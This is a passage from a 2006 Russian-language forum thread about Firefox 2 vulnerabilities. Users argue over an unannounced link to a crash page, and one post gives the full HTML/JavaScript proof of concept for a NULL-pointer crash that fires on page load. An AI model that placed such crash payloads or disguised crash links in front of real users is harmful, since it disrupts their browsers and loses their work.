Страница 2 из 3

Добавлено: Чт окт 26, 2006 10:22 pm
Nikola
Блин SOLDIER предупреждать надо :evil: , хорошо хоть теперь сохранение сессий имеется :D

Добавлено: Чт окт 26, 2006 10:28 pm
scum
SOLDIER писал(а):Кстати, раз уж в ветке про ИЕ говорят о дырках, то у ФФ2 тоже её обнаружили. http://lcamtuf.coredump.cx/ffoxdie.html Господин Михал Залевски постаралси. ;)
Я тоже не понял, в чем прикол? Любой браузер так можно завесить. У меня Session Saver установлен и работает без сбоев, но на фига мне было сейчас перезагружать браузер с 83 открытыми вкладками? Я не имею привычки нажимать на ссылки, но я думал, что проверенным людям можно доверять.

Добавлено: Чт окт 26, 2006 10:34 pm
SOLDIER
Странные вы люди. Название ссылки ffoxdie не насторожило? Ну ладно - я не думал, что вы её нажмёте с 85 табами. Простите. :oops:

Добавлено: Чт окт 26, 2006 10:37 pm
SOLDIER
Собссна описание - http://www.mozilla.org/security/announc ... 06-59.html
ФФ не падает при посещении.

Добавлено: Чт окт 26, 2006 10:42 pm
scum
SOLDIER писал(а):Странные вы люди. Название ссылки ffoxdie не насторожило? Ну ладно - я не думал, что вы её нажмёте с 85 табами. Простите. :oops:
Не думаю, что есть что-то странное в нежелании видеть смысл там, где его нет. Например, в названии ссылок. А даже если и попытаться его увидеть в конкретном названии, то ни из чего не следует, что он должен закрыться.

Добавлено: Чт окт 26, 2006 10:44 pm
SOLDIER
Это "чтоб трава зелёной не казалась".

Добавлено: Чт окт 26, 2006 10:52 pm
scum
SOLDIER писал(а):Это "чтоб трава зелёной не казалась".
Так, что до меня, я и так его (Firefox) идеалом не считаю ;). Стал использовать как основной только с момента выхода версии 1.5 - она стала стабильно работать (перестала с ошибками вылетать), чего ранее не наблюдалось.

Добавлено: Пт окт 27, 2006 8:55 am
Nick
Поиск идеала штука сложная, врят ли когда найдешь.

Добавлено: Ср ноя 01, 2006 9:53 pm
SOLDIER
М-да... Ишшо одну дыру нашли. То, что называется "разыменование нулевого указателя" (NULL pointer dereference). PoC - вот тут - http://werterxyz.altervista.org/Firefox2Range.htm Предупреждаю - со 100 открытыми ссылками заходить не стоит. Помимо 2-ки - успешно свалил мой ФФ 1.5.0.7. Код вот -
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Good bye Firefox!</p>
</body>
</html>

Добавлено: Ср ноя 01, 2006 10:31 pm
Nick
NoScript в руки от всякого поганого javascript